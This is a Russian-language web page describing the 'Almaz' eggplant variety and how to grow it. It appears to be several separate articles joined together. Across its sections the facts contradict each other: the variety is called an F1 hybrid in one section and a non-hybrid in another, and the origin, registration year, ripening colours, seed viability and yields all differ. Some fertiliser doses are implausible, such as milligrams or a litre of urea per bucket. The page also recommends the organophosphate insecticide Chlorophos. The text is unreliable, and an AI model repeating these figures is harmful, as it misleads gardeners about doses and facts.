1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Баклажан алмаз характеристика и описание сорта

Сорт баклажана Алмаз

Баклажан сорта «Алмаз» может по праву считаться самым популярным для выращивания не только на территории России, но и в областях Украины и Молдовы. Как правило, его высаживают в закрытый грунт, для которого он и предназначен. Среди семян в магазине именно «Алмаз» выбирают чаще всего, и на многих сайтах агрофирм его представляют как самый продаваемый товар на протяжении многих лет. Охарактеризуем сорт, опишем его достоинства и недостатки, покажем реальные фото урожая.

Краткое описание

«Алмаз» – это сорт баклажана, а значит, семена перезрелых плодов можно собирать и высаживать вновь.

Внешне он выглядит стандартно, плоды среднего размера, вытянутые, темного цвета. Иногда плод именуют черным алмазом. Сорт считается среднеранним, срок отдачи урожая во многом зависит от региона произрастания и культивирования. Ниже представлена таблица описания сорта. Характеристика позволяет заранее определиться с выбором.

Таблица

Среднеспелый сорт, 110-150 дней с момента появления первых всходов до технической зрелости.

Вкусовые и товарные качества

Отличные, долго хранится, прекрасно перевозится с места на место, используется как универсальный продукт.

Стойкость к вирусам и болезням

Устойчив к вирусу огуречной и табачной мозаики, столбуру и увяданию.

Длина составляет 15-17 сантиметров, вес плода колеблется от 100 до 180 грамм.

Цвет плода и мякоти

Плод темно-фиолетовый, почти черный, мякоть слегка зеленоватая.

Невысокий, высота до 55 сантиметров, компактный.

Требования к уходу

Прополка, рыхление почвы, обязательны подкормки.

Описание схемы посева

60х30, можно чуть шире; на 1 квадратный метр приходится не более 6 растений

Особенности выращивания сорта

Чаще выращивают в теплицах как в обогреваемых, так и в необогреваемых, в открытый грунт можно высаживать только на юге России, где исключены похолодания.

Урожайность с 1 кв. метра

Сбор урожая упрощается за счет того, что куст «Алмаза» не имеет шипов. Это очень удобно.

Посев

Различные сорта баклажан в нашей стране привычнее высаживать в теплицу. Даже если условия позволяют сделать это в открытом грунте, предпочтение отдают способу, состоящему из двух этапов:

  1. Посев семян на рассаду.
  2. Выращивание рассады.

Спустя месяц после посева семян, станет видно, какие из них дадут богатый урожай, а какие – нет. Для выращивания потребуется соотнести требования к почве с теми возможностями, что имеются на данный момент.

  • почва должна быть нейтральной или слабо кислой;
  • если почвы кислые, каждые три года вносят известь;
  • при подготовке грунта обязательно вносят органику (примерно за неделю, можно раньше);
  • высаживать баклажан можно после моркови, лука, капусты, тыквы и кабачка.

На упаковке описание сорта всегда представлено крайне скудно, поэтому многим огородникам приходится обращаться за информацией в другие источники, читать отзывы, о которых мы расскажем ниже.

Семена «Алмаза» мелкие, их предпочитают замачивать перед посевом, хотя это необязательно. Подготовить семена можно последовательно, пройдя несколько этапов:

  • калибровка;
  • обеззараживание;
  • стимуляция к росту.

Чтобы правильно определить срок посева для региона, необходимо отсчитать 50-70 дней до дня, когда можно высаживать баклажан в теплицу или в открытый грунт.

Ниже мы представим описание комплексного ухода. Сорт «Алмаз» неприхотлив, но определенные требования все же придется выполнить.

Высаживать семена нужно в отдельные розетки. Пикировку растение переносит плохо. На фото ниже показано, как должны выглядеть баклажаны сорта «Алмаз».

Выращивают этот сорт с 1983 года, за это время он не только понравился огородникам, но и пришелся по душе профессионалам, которые выращивают баклажан большими партиями.

Уход за растением производится в соответствии с определенными правилами:

  • не сажайте растения близко друг к другу (максимум 6 кустов на квадратный метр);
  • при высадке рассады заглублять ее не нужно;
  • весь уход сводится к рыхлению, поливу и подкормке.

Рыхление нужно производить аккуратно, ведь корневища у баклажанов слабые. Что касается подкормки, то она должна быть и органической, и минеральной.

Схема подкормки такова:

  • перед тем как высаживать баклажаны в грунт, вносят 10 килограмм органики на 1 квадратный метр;
  • весной лучше внести азот, а калий и фосфор осенью перед посадкой;
  • после высадки в период цветения и плодоношения сорт «Алмаз» подкармливают минеральным комплексом до трех раз.

Краткий обзор сорта приведен на видео.

Отзывы

Черный Алмаз среди всех сортовых баклажан – это то самое название, которое приходит на ум после прочтения отзывов. Плоды имеют глянцевую тонкую кожицу. Среди абсолютных плюсов в характеристике огородники называют следующие:

  • низкая цена на семена;
  • каждый куст имеет не менее 5-ти завязей;
  • сорт долго и обильно плодоносит;
  • плод глянцевый, красивый черный;
  • мякоть без горечи;
  • стоек как к перепадам температур, так и к часто встречающимся вирусам.

Среди недостатков есть лишь один, о котором обязательно нужно сказать: формирование цветов и плодов происходит в нижней части растения, поэтому за плодами тщательно следят. Если они созрели, немедленно срезают, чтобы бактерии с почвы не испортили баклажаны.

За основу брались только отзывы огородников, которые самостоятельно выращивали баклажан «Алмаз» на своих грядках.

Если вы однажды высадите этот сорт, он станет наиболее любимым. Большинство дачников считают его классическим и высаживают каждый год, хорошо зная особенности сорта. Это позволяет гарантированно собирать большой урожай баклажан со своих грядок. Опыт многих для новичков послужит примером.

Описание баклажана Алмаз

Баклажан Алмаз категории ф1 обладает высокой урожайностью, хорошей транспортабельностью и длительными сроками хранения. Подробное описание сорта рассмотрим в статье.

Описание баклажана Алмаз

Характеристика сорта

Сорт баклажана Алмаз был выведен в России в начале 1980 года. В 1983 году было принято решение внести его в Государственный реестр Российской Федерации. Поставками семян занимается компания Элита. Идеально подходит для выращивания во всех регионах страны. В прохладных регионах посадка должна проводиться в тепличных условиях. Благодаря плотности плодов и растения, проводить уборку урожая можно с помощью механизированной техники.

Характеристики сорта указывает на то, что период вегетации составляет всего 120 дней с момента появления первых всходов. Урожайность высокая: с 1 м2 можно собрать около 10 кг отборной продукции.

Описание куста

Рассмотрим характеристики куста данного сорта.

  • кусты баклажанов Алмаз компактные, их максимальная высота составляет 50-60 см;
  • ветвление равномерное, что позволяет получать ранний урожай;
  • листья средние по величине, насыщенного зеленого цвета, с матовой поверхностью;
  • форма листа широкая и овальная;
  • прожилки на листьях фиолетового цвета;
  • черешки фиолетового цвета, на них нет шипов, что существенно упрощает процесс уборки урожая.

Описание плода

Плоды цилиндрической формой с глянцевой поверхностью. Длина отдельного плода может быть от 10 до 19 см, в зависимости от качества ухода. Ширина может варьироваться от 3 до 7 см. На время технической зрелости плоды нежно-фиолетового оттенка. Как только они доходят до биологической зрелости, меняют цвет на насыщенный бурый. Средний вес отдельного плода составляет 150-200 г. Урожайность высокая: с 1 м2 можно собрать около 10 кг отборной продукции.

Описание указывает на то, что цвет мякоти зеленый, с небольшим кремовым отливом. Внутри плода содержится множество семян, которые не годятся для посадки.

Вкусовые качества и использование

Мякоть характеризуется высокой плотностью, что позволяет готовить из этого продукта различные блюда. Как таковых вкусовых качеств не наблюдается. Единственный факт, который необходимо отметить – это отсутствие горечи.

Баклажаны Алмаз являются универсальными в использовании: можно готовить вкусные свежие салаты, которые часто употребляются во время диетического питания, запеканки, овощные рагу или просто запекать мякоть этих овощей в духовом шкафу, добавляя различные белковые продукты (яйца, сыр и т.д.).

Баклажаны сорта Алмаз можно перевозить на длительные дистанции. По этой причине выращивают эту культуру с целью дальнейшей продажи.

Процесс выращивания

Самый популярный способ выращивания — рассадный

Правильная агротехника – это залог качественного урожая. Выращивание этого сорта может проводиться несколькими способами. Каждый из них подходит для определенного региона.

В центральных и южных областях можно проводить посадку культуры безрассадным методом. Теплый климат позволяет защитить растения от заморозков. Во всех других областях рекомендуется проводить посадку рассадным способом, чтобы защитить культуру от болезней и вредителей.

Рассадный метод

Посадка этого сорта проводится в начале марта. Существует несколько основных этапов проведения высаживания с помощью рассады.

  1. Нужно подготовить контейнеры, в которые насыпается плодородная почвы (суглинистая или чернозем).
  2. Теперь следует высадить непосредственно семена. Если вы будете высаживать их в общий контейнер, то нужно придерживаться дистанции в 7 см. Для лучшей безопасности семян (от нарушения корней или сухости) лучше проводить посадку в отдельные стаканы. Глубина посева составляет 1,2 см.
  3. Высаженные семена необходимо полить теплой водой и накрыть контейнеры пленкой. Через 10 дней ее можно снять. Это делается, чтобы первые всходы появились намного быстрее.
  4. Переместите контейнер с семенами в теплое помещение с температурой около 20-27°С. С появлением первых всходов температуру снижают до 13-18°С. Это действие необходимо, чтобы сформировалась мощная корневая система.
  5. Через 2 недели после посадки нужно подкормить семена раствором мочевины (20 мг на 2 л воды).
  6. Посадка в открытый грунт проводится через 30-40 дней после посадки семян. За это время она должна сформироваться и быть подготовленной к перемещению на постоянное место. Высаживать можно только ту рассаду, на которой сформировались 2-3 пары листьев.
  7. Место для посадки должно быть хорошо освещенным и не затененным другими растениями.
  8. Схема посадки 60х40 см.

Высадка в открытый грунт

Первый этап заключается в подготовке семян в домашних условиях. Для этого семена необходимо замочить в теплой воде, буквально на 20-30 минут. Те, которые всплывут, нужно выбросить, т. к. они не пригодны для посадки. Оставшийся посадочный материал следует высаживать в условиях теплого грунта, т. е., подходит только та почва, которая прогрелась до температуры в 14-16°С. Обычно это делают в середине мая.

Высаживать семена следует на дистанции в 5-7 см друг от друга. Как только появятся первые всходы, важно удалить мелкую рассаду, оставляя только крупную. Всходы должны располагаться на расстоянии 30 см друг от друга.

Баклажаны Алмаз не требовательны к уходу. Следует нормализовать график полива – делать это нужно 1 раз в 3 дня, и только теплой водой. Проводят оросительные процедуры утром или вечером, чтобы снизить риск испарения влаги под воздействием солнечных лучей. После каждого полива следует пропалывать участок и удалять сорняки. Это позволит избавиться от верхней корки на почве, которая может привести к корневой гнили. Рыхление позволяет сделать так, что в корневую систему попадает необходимое количество кислорода и питательных веществ.

Подкормки осуществляются в несколько этапов.

  1. Через 3 недели после посадки растения в открытый грунт. В этот момент следует отдать предпочтение органическим удобрениям. Идеальный вариант – использование мочевины (100 мл на 2 л воды).
  2. Через 20 дней после первой. Следует развести в 10 л воды 30 мг суперфосфата и 1000 мл мочевины. В каждый куст вливают около 2 л раствора. В момент активной всхожести семян следует развести в 10 л воды 2 кг коровяка и влить в каждое растение по 1,5 л раствора.

Важно правильно формировать куст. Для лучшего роста и высокой урожайности нужно оставлять только 3 стебля. По причине тяжелого и плотного стебля, каждый куст нуждается в подвязке к опоре.

Вредители и болезни

Баклажаны сорта Алмаз устойчивы к фитоплазмозу, вирусной мозаике и вершинной гнили. Отмечается устойчивость к фузариозу и фитофторозу. Единственный недостаток этого сорта – подверженность вредителям.

Самыми распространенными врагами Алмаза считаются жуки и тля. Избавиться от жуков можно, собирая их руками, или же используя химические инсектициды. В качестве химических препаратов следует использовать Хлорофос (40 г на 10 л воды). Подобным раствором проводят опрыскивания, каждые 10 дней. Бороться с тлей можно с помощью медесодержащего препарата Оксихом (50 мл на 10 л воды). С его помощью проводят опрыскивания с интервалом в 7 дней.

Баклажан «Алмаз»

Баклажаны «Алмаз» вырастают без горького вкуса соланина и это заложено в нём при селекции. Поэтому в части соланина он является полностью безопасным. Даёт большие урожаи. Баклажан Алмаз не требует трудоёмкого ухода.

Описание сорта баклажан Алмаз

Описание растения

Баклажаны относятся к пасленовым, поэтому они являются родственниками помидор, перца и картофеля. Хотя происхождение баклажан неизвестно, на основании многих письменных свидетельств древности с уверенностью можно сказать, что они происходят из Индии, Индокитая и Китая. Отсюда они перекочевали на мусульманский восток, где выращивание баклажан стало привычным занятием для местного населения. Дальше баклажаны распространились на африканские регионы, когда мусульмане обосновались на Севере континента. Затем баклажаны попали в Европу. Кстати, в Европе баклажаны долгое время не получали должного признания. Это, несомненно, связано с двумя существенными факторами: во-первых, вероятным незнанием их приготовления, а с другой стороны, потреблением несъедобных сортов.

Что касается их классификации, баклажаны можно разделить на три разновидности, в зависимости от формы: шаровидные, продолговатые (длинные) и цилиндрические. В Европе чаще встречается продолговатая форма, хотя есть теплицы, где высаживается много сферических баклажан.

Происхождение сорта Алмаз

Выведен на Украине в конце семидесятых путём селекции. Но документы на сорт и все права на него находятся в России. Алмаз уже давно зарекомендовал себя в качестве холодоустойчивого сорта и даёт отличные урожаи на Дальнем Востоке, на Урале, в Западной Сибири — это районы с холодным климатом.

Сорт Алмаз средний по вызреванию. Период после высадки рассады равен 3-4 месяца в среднем. На юге вегетативный период несколько короче. Потому что растение на юге получает больше солнца, температура почвы заметно выше. Растёт в виде аккуратного куста 40-60 см в высоту. Хорошо растёт на рыхлых, содержащих органические удобрения, почвах. Предпочитает хорошо освещённые и защищённые от ветра участки. Длительная жара более 30°C и длительное похолодание подавляют рост растения, вызывают опадание цветов и завязей. Семена на рассаду сеют с конца зимы до половины марта в маленькие горшочки. Желательно купить специальный грунт для рассады. Когда почва прогреется до 14°C, рассаду можно переносить в теплицу или под небольшие плёночные парники при наличии двух-трёх пар листиков.

Это растение, которое требует много света, от 10 до 12 часов в день. Если растение не получает необходимого света, его плоды принимают удлинённую форму, практически прекращается цветение, а полученные плоды не будут иметь приятной формы и/или мякоти хорошего качества. При пасмурной погоде летом созревание плодов задерживается.

Данный сорт зарекомендовал себя с лучшей стороны. Постоянно даёт надёжный и хороший урожай, не требует особых усилий при уходе. Сорт хорош и на грядках, и в закрытом грунте. Это главная причина того, что ему отдаётся предпочтение у дачников.
Благодаря развитым и крепким корням на нём возникает большое количество пасынков, что увеличивает урожайность сорта и ведёт к более раннему созреванию.

Выбрасывает большое количество листьев. Лист овальный, среднего размера, яркого зелёного цвета. Имеет фиолетовые или зелёные прожилки. Плодоножки зелёного цвета, венчик и чашечка — слегка фиолетового оттенка. На чашечке отсутствуют шипы. Это облегчает сбор урожая.

Описание плодов

Плоды глянцевые, тёмно-фиолетового цвета. Форма плода цилиндрическая. Длина баклажана обычно 10-15 см, но бывает и до 20 см. Ширина 3-6 см. Ко времени технической зрелости плоды становятся бурыми, а при достижении биологической зрелости они уже наливаются тёмно-фиолетовым цветом. Мякоть спелого баклажана белая с небольшим зеленоватым оттенком и без горького вкуса. Внутри баклажана есть много семян, которые ко времени сбора урожая являются ещё недозрелыми. Чтобы они годились для выращивания, нужно подождать, когда плод перезреет, достать семена и высушить их. Баклажан Алмаз является самостоятельным сортом, но не гибридом. Поэтому семена из перезревших плодов можно собирать для использования при посадке на следующий год. Но делать это нужно осторожно, поскольку через пару, тройку лет унаследованные свойства теряются. Сорт становится уже не столь плодовитым, как раньше. Плоды также теряют свой вкус. Поэтому через некоторое время целесообразно приобретать новый посадочный материал.

Сорт Алмаз имеет отличные кулинарные качества. Вкусовые качества приготовленных плодов парадоксальны. В сыром виде баклажан абсолютно безвкусен. Но после кулинарной обработки вкус приготовленных баклажанов настолько изменяется, что в разных блюдах они демонстрируют большое разнообразие вкусов.

Плоды баклажан сорта Алмаз легко выдерживают длительные перевозки на большие расстояния автомобильным транспортом.

Характеристика сорта баклажан Алмаз

Плодоношение и урожайность

Растение даёт первый урожай через 3–5 месяцев (100-140 дней) после первых всходов. Сроки зависят от климатических условий, ухода. Алмаз даёт довольно хорошие урожаи. При хорошем уходе и хорошей погоде с 1 м.кв. в среднем можно собрать 7,5 кг плодов, но не менее пяти. Рекорд урожайности зафиксирован на уровне 8 кг с 1 м.кв.

Для Алмаза характерно регулярное и стабильное плодоношение в течение всего сезона.

Устойчивость к заболеваниям и вредителям

Рассматриваемый сорт хорошо противостоит столбуру, и другим заболеваниям вроде вирусной мозаики, вершинной гнили. Средне устойчив к фузариозу и фитофторозу. Для выявления очагов заболеваний нужно внимательно осматривать растения.

Существенный минус Алмаза в том, что он плохо противостоит насекомым-вредителям.
Сегодня существует два основных метода против насекомых-вредителей:

  • собирать насекомых и их личинок руками;
  • применять инсектициды.

Основная опасность при выращивании для баклажана Алмаз – это колорадский жук. Его личинки быстро и активно съедает всю зелень на растении.

Опасен и паутинный клещ. Намного реже нападают белокрылка, медведка и тля. Ещё на растения нападают слизни.

Достоинства и недостатки сорта

Достоинства:

  • хорошие урожаи;
  • неплохая сопротивляемость как вирусам, так и грибкам;
  • несложный уход;
  • использование в кулинарии (тушат, варят, пекут, солят, консервируют).

Недостатки:

  • теплолюбивое растение;
  • необходимость в удобренной почве;
  • необходимость периодической подкормки.

Выращивание и уход

Сроки посадки, пересадки рассады в грядки и в закрытый грунт

В южных регионах РФ принято садить рассаду на грядку с мая. На средней широте в необогреваемую теплицу – тоже в мае. В начале лета рассаду можно высадить на открытое место под плёнку.

Определить точные даты пересадки в открытую грядку сложно. Лучше дождаться, когда
температура воздуха поднимется до +20°C, а температура почвы уже не опускается менее 16°C. Рассаде к этому времени уже должно быть не менее 2-х месяцев.

Посев

Сорт Алмаз очень страдает от пикировки. Для выращивания крепких, здоровых сеянцев предпочтительнее семечки этого баклажана сеять в торфяные или пластиковые стаканчики. Грунт нужен смешанный: земля, песок, торфяная почва. Можно купить готовый посадочный грунт в магазине.

Семечки рекомендуется засевать в один стаканчик по 2-3 шт. При посеве семечек в ящик расстояние между ними оставить не менее 5 см. Глубина посадки равна 1,5-2,0 см.

Выращивание рассады

Тару со всходами поставьте в самое светлое место, и без сквозняков. Температура ночью от +15°C, днём до +32°C. Оптимально +25-27°C. Проверить с помощью люксметра, есть ли достаточная освещённость. Если света мало, то поставить фитолампу.
Пару растений поместите в прозрачные стаканчики – для определения момента пересадки на грядку. Корни в прозрачных стаканчиках подскажут – их будет очень много. В первые дни поливать всходы нужно больше. Держать землю постоянно увлажнённой. По мере подрастания всходов полив постепенно уменьшать до 1 раза в день. Подкормку рассады производить два раза в месяц.

За 12-14 дней до пересадки на грядку следует закаливать всходы на воздухе, увеличивая сеансы на открытом воздухе до одного дня.

Подготовка гряд

Грядки нужно подготовить заранее. Ориентацию грядки выбрать с севера на юг. Также нужно выбрать место, защищённое от ветров. За две недели до пересадки перекопать землю, удобрить её навозом или минеральным удобрением с азотом. За день до пересадки сеянцев нужно полить грядку.

Сроки высадки рассады на грядку и в закрытый грунт

На юге России высадить рассаду в открытый грунт можно в начале мая. В средней полосе в неотапливаемую теплицу — тоже в начале мая. В начале лета рассаду можно высадить на открытое место под плёнку.

Определить точные сроки высадки в открытую грядку сложно. Лучше дождаться, когда температура воздуха поднимется до +20°C, а почвы — не ниже 16°C. Рассада к этому времени уже должна достигнуть не менее 2-х месяцев. На юге России высаживать рассаду на открытом воздухе можно с мая. В средней полосе в неотапливаемую теплицу – в начале мая.

Высадка рассады на грядку

За день перед пересадкой следует полить рассаду. Размещение баклажанов в ряду не менее, чем через 30 см. Расстояние между рядами не менее 50 см. Порядок действий желательно соблюдать следующий:

  • вырыть ямку под размер стаканчика и наполнить её тёплой водой;
  • подождать, пока вода не впитается в землю и положить в ямку растение с комом земли;
  • далее присыпать его землёй и слегка утрамбовать. Замульчировать грунт вокруг растения сухой травой.

Уход за растениями

Полив – раз в три дня. Если засуха – ежедневно. Прополка сорняков, рыхление почвы по мере необходимости. Через три-четыре недели – подкормки. Сначала азотные подкормки. Сразу после цветения обрывать листья нельзя. После появления плодов – подкормить простой золой. Количество стеблей не более трёх. Пасынки не удалять. Проводить обязательную подвязку, т.к. плоды могут сломать стебель. Опрыскивание, сбор вредителей вручную.

Заключение

Сорт баклажан Алмаз привлекает к себе внимание дачников своими прекрасными свойствами. Это урожайность до 7,5 кг с 1 м.кв., но не менее пяти. Постоянная плодовитость из года в год. Непритязательность и простота ухода. Хорошая лёжкость и хорошая сохранность урожая. Но это не означает, что выращивание баклажан сорта Алмаз просто прогулка на дачу. Зато наградой дачнику будут всегда вкусные баклажаны универсального и удивительного сорта «Алмаз».

Баклажан Алмаз

Баклажан Алмаз – давний и достаточно известный сорт. Даже при минимальном уходе в неблагоприятных условиях дает обильный урожай. Но стоит отметить, что растение требует особых нюансов в выращивании, которые способствуют качеству и количеству урожая. Плоды баклажанов Алмаз вкусные, практически не горчат. Стоит отметить, что данный сорт не относится к гибридам. По этой причине дачник может самостоятельно получать семена из полностью созревших плодов.

История селекции сорта

Сорту баклажанов Алмаз более 50 лет. Данная культура с 1979 года зарегистрирована в государственном реестре селекционных достижений. Оригинатором сорта является Насруллаев Н. М., а также компания “Интерсемя”. Допущен к выращиванию на западе Сибири, Урала, Дальнего Востока и Центральном Черноземье.

Описание баклажана Алмаз

Характеристика и описание сорта баклажана Алмаз известна многим дачникам. Культура достаточно надежная – всегда плодоносит, не требует много мероприятий по уходу, дает хорошие плоды как в теплице, так и на открытой грядке. По этим причинам многие огородники отдают предпочтение этому сорту.

Исходя из описания, баклажаны Алмаз относятся к сортам средней спелости. От появления всходов до полного созревания проходит от 110 до 150 дней. Данное значение может меняться в зависимости от условий и региона произрастания.

Если культура получает много солнца, питания полезными веществами и регулярного полива, развитие растения происходит гораздо быстрее. При недостатке света срок созревания может увеличиться.

Ботва баклажана сорта Алмаз компактная, растет в высоту 40-60 см. Данный вид культуры отличается от других ранним и дружным ветвлением. В период активного роста баклажан наращивает большое количество пасынков, которые способствуют высокой урожайности культуры.

Описание плодов

Плоды сорта Алмаз цилиндрической формы темно-фиолетового цвета. Длина одного баклажана – от 15 до 20 см, диаметр – 4-7 см. Самые нижние плоды всегда касаются земли. Внутри баклажан зеленого цвета, с мякотью средней плотности. Вес одного плода – от 90 до 170 г.

Характеристика баклажана Алмаз

Исходя из характеристики баклажанов сорта Алмаз, можно отметить, что данная культура не имеет шипов, что становится очень удобным при сборе урожая. Сорт отлично приживается в открытом грунте или в тепличных условиях.

Урожайность и плодоношение

Данный сорт относится к достаточно урожайным. При правильных условиях произрастания с 1 м 2 можно собрать от 2 до 8 кг плодов. Баклажаны, которые не были вовремя собранны, считаются перезревшими, становятся бурого цвета. Такие овощи практически непригодны к употреблению по причине грубой мякоти и жестких семян.

Область применения плодов

Баклажан сорта Алмаз отлично сгодится для приготовления горячих блюд или зимней консервации. Исходя из отзывов и рекомендаций дачников, перед приготовлением баклажанов сорта Алмаз, рекомендуется немного вымочить плоды в соленой в воде.

Устойчивость к заболеваниям и вредителям

Данный сорт имеет хороший иммунитет к вирусным заболеваниям и грибкам. Но к сожалению, растение практически всегда подвержено поражению колорадским жуком.

Сегодня существует несколько методов борьбы с насекомыми-вредителями:

  • производить сбор насекомых и их личинок руками;
  • применить специальные средства – инсектициды.

Овощи, которые обрабатываются химическими препаратами, нередко, приносят вред человеческому организму. Но существуют средства, которые применяют единожды и только при высадке растения в почву.

Например, при опрыскивании средством “Корадо”, препарат впитывается только в листья. Время действия состава – до 4-х недель. Овощи, которые были опрысканы данным средством в период активного роста, будут под надежной защитой.

По отзывам дачников, баклажан сорта Алмаз можно уберечь от вредителей способом надевания на кусты пластиковых бутылок. Метод достаточно интересен и эффективен. Для этого:

  1. Срезают с бутылки дно и верхушку.
  2. Далее, надевают на только высаженную рассаду.
  3. Колпаки в форме цилиндра оставляют до окончания вегетационного периода.

Стоит отметить, что колорадский жук – насекомое, умеющее летать. Но к счастью, большинство вредителей перебираются ползком и попадают на культуры из земли. Поэтому укрытие из пластиковых бутылей станет надежной защитой.

Кроме защиты от вредителей, пластик выполняет функцию “барьерного корсета”, который будет беречь от сильного ветра. Таким образом, баклажан лучше приживается, корневая система не пересыхает.

Достоинства и недостатки сорта

Исходя из описания сорта баклажанов Алмаз, можно отметить ряд достоинств:

  • высокая урожайность;
  • устойчивость к вирусам и грибкам;
  • благодаря компактности, удобны в посадке и выращивании;
  • хорошая транспортабельность и отличная лежкость;
  • широко используется в приготовлении различных блюд.

Среди недостатков имеется один, но значительный, который у многих отбивает желание в выборе именно этого сорта на посадку. Баклажан Алмаз подвержен поражению колорадским жуком. Не подобрав правильные способы борьбы с вредителем, можно загубить всю посаженую грядку.

Особенности посадки и ухода

Отзывы дачников о баклажане сорта Алмаз твердят о том, что культуру лучше высаживать рассадным способом. Причина этому проста – длительность созревания способом обычного посева достаточно долгая. Нередко, в неблагоприятных условиях для произрастания, данный сорт может не дать плоды – просто не успеть созреть. Поэтому лучше высадить Алмаз рассадным способом.

Срок посадки на рассаду

Рассаду баклажана сорта Алмаз высаживают через 2-2,5 месяца от момента появления всходов. Данное время назначено на посадку под открытое небо. Если сорт планируется выращивать в тепличных условиях, оптимальным временем будет высаживать ростки на пару недель раньше.

Подготовка почвы

Грунт для посадки баклажанов можно приобрести в специальном магазине. Такая почвосмесь будет богатой на минеральные и органические удобрения.

Почва, приобретенная в садовом магазине, практически не нуждается в обеззараживании, а грунт из дачного участка требует обработки.

Если дачник остановил свой выбор не на купленной почвосмеси, а решил набрать земли из собственной дачи, рекомендуется грунт немного подкормить полезными веществами. Для этого используют:

Также важно не только удобрить землю, но и обеззаразить от вредителей. Для этого землю прогревают в духовке.

После прогрева для восстановления питательных веществ землю оставляют отдохнуть на 7-10 дней.

Подготовка посевного материала

Семена баклажанов Алмаз можно заготовить самостоятельно, а можно приобрести в магазине. Если дачник планирует произвести забор семян самостоятельно, рекомендуется разрезать спелый баклажан и руками собрать семечки. Высушив семена, можно приступать к обработке.

Обеззаразить посевной материал можно одним из методов:

  1. Выдержав семена 5-7 мин в воде при температуре 50-60 градусов.
  2. Замочив на 30 мин. в крепком составе перманганата калия (0,5 г на пол-литра воды).
  3. Произвести обработку в перекиси водорода (2 мл на полстакана воды).

После обработки зерна промывают, просушивают и готовят к посадке.

Чтобы получить раннюю рассаду, можно проращивать их в теплом помещении во влажной салфетке.

Приобретенный посевной материал, который находится в защитной цветной оболочке обрабатывать и проращивать нельзя.

Посадка рассады

Для правильного выполнения процедуры, следует использовать агротехнический метод посадки:

  • подготовить просторный ящик для рассады;
  • высадить семена на глубину 1,5 см;
  • накрыть полиэтиленом и поставить в теплое место до прорастания;
  • после появления всходов пересадить ростки по отдельным емкостям 10 на 10 см.

Уход за ростками

Высаженной рассаде очень важно обеспечить регулярный полив. Грунт с ростками должен быть умеренно увлажнен, не допускается пересыхание почвы.

Немаловажным будет обеспечить хорошее освещение росткам. При недостатке солнечного света, следует использовать фитолампу.

Когда рассада подрастет, можно уменьшить полив – 1 раза в 3 дня будет достаточно. Для полива использовать только отстоянную, слегка теплую воду.

Период полного созревания рассады – около 2 месяцев, поэтому баклажаны важно обеспечить питательными веществами. Первая подкормка осуществляется через 14 дней после высадки в пластиковые стаканчики. Последующее внесение удобрений должно производиться через каждые 2 недели.

Закаливание

Любая рассада нуждается в закаливании. Такие растения лучше приживаются, легче переносят резкую смену температур. За 7-10 дней до высадки на открытую грядку, можно начинать закаливать ростки. Процедура выполняется постепенно. Выносятся ростки на улицу вначале на 1 час, постоянно увеличивая время до целого дня.

Подготовка грядки

За 3 недели перед высадкой рассады в почву, грядку следует перекопать и подкормить. Некоторые дачники подготавливают участок осенью. Баклажан черный Алмаз любит рыхлые плодородные грунты. Поэтому на 1 м 2 следует внести ведро компоста и 2 ст. золы.

Посадка

При высадке в теплицу баклажан Алмаз сажают рядом с помидорами. Очень важно разместить растения так, чтобы обе культуры получали достаточно света.

Посадка на открытую грядку осуществляется по такому принципу:

  1. За сутки до высадки рассады ростки обильно полить, чтобы, извлекая корень из почвы, не повредить его.
  2. На участке выкопать небольшие лунки, заполнить их водой.
  3. После впитывания влаги высадить один росток вместе с комком грунта, присыпать почвой, слегка уплотнив.
  4. После посадки всех кустов произвести мульчирование с соломой.

Правильную посадку баклажана сорта Алмаз в теплице можно посмотреть на фото:

Заключение

Баклажан Алмаз – отличный выбор для посадки культуры, чтобы получить обильный урожай. При правильном уходе и выполнении обязательных мероприятий по профилактике и борьбе с колорадским жуком, можно получить вполне приличные плоды. Обеспечив баклажаны Алмаз плодородной почвой и регулярным поливом, можно избежать хлопот в выращивании и уходе.

Баклажан Алмаз

Селекционеры вывели новые сорта: неприхотливые, приспособленные к прохладным климатическим условиям центральной России и северных широт. Сорт баклажанов Алмаз относится именно к таким, за что успел полюбиться многим садоводам, ценителям культуры.

Историческая справка селекционной работы

Алмаз — сорт относительно молодой, ему не более 40 лет. Культуру внесли в 1979 году в государственный реестр успехов селекционной работы. Создатель сорта селекционер Насруллаев Н.М. вместе с семеноводческим хозяйством «Интерсемя» являются обладателями патента.

Сорт предназначен для выращивания в открытом и закрытом грунте на Урале, Дальнем Востоке, в Сибири, на Черноземье.

Баклажан Алмаз, по отзывам огородников, зарекомендовал себя с положительной стороны:

  • стойкий к болезням;
  • урожайный;
  • неприхотливый.

Описание и характеристики сорта

«Синенькие» — так ласково называют овощи в южных регионах России, где их выращивают с давних пор.

Баклажан Алмаз — однолетнее травянистое растение. Кустик не раскидистый, вырастает до 50-60 см.

  1. Относится к среднеспелым сортам. От посадки до урожая не менее 4 месяцев.
  2. Листочки зеленые с вкраплениями фиолетовых прожилок.
  3. Чашечка глянцево-фиолетовая без шипов.
  4. Плоды небольшие, 18-20 см длиной, весом 150-160 г созревают на нижней части стебля. Имеют продолговатую форму. Кожица плотная, но не толстая. Мякоть сочная на вкус, светлая с нежно-зеленым оттенком.
  5. Высокая урожайность сорта обеспечивается большим количеством пасынков на кусте.

Баклажан вкусный, не горчит. Хозяйки используют его:

  • с целью приготовления горячих блюд;
  • холодных закусок;
  • консервирования.

Если посажен баклажан сорта Алмаз, то урожай обеспечен.

Особенности выращивания

В южных областях России данный сорт баклажанов произрастает в открытом грунте, а вот в центральных и северных — исключительно под пленочным укрытием или в теплице.

  1. «Любит» плодородную легкую почву, богатую органическими удобрениями (навоз, компост).
  2. Место для посадки должно хорошо освещаться, защищено от ветра.
  3. Плохо переносит жару (когда температура поднимается выше 30 градусов), долгое понижение температуры воздуха. Факторы, которые могут привести к гибели растения, либо оно скинет листья и завязи.
  4. Выращивают рассадой.

Семена начинают высаживать в самом конце зимы либо в первой декаде марта.

  1. В отдельные горшочки помещают по 2-3 штуки семян. Заглубляют на 1 см. Увлажняют землю разбрызгиванием. Если сажают по несколько семян в большую емкость, расстояние между ними должно быть не менее 6 см.
  2. Пленкой закрывают емкость или горшочки и помещают в хорошо освещенное место. Важно, чтобы не было сквозняков.
  3. Семена дадут всходы через 10-12 дней. Всходы помещают в более прохладное место на 5 дней. В это время начинается сильный рост корней.
  4. Если сеянцы в одной емкости — их надо разредить (пикировать) и рассадить в отдельную посуду после появления первых листочков.
  5. Через 55-60 дней саженцы высаживают в теплицу либо в открытый грунт, если земля прогрелась до 15-16 градусов.

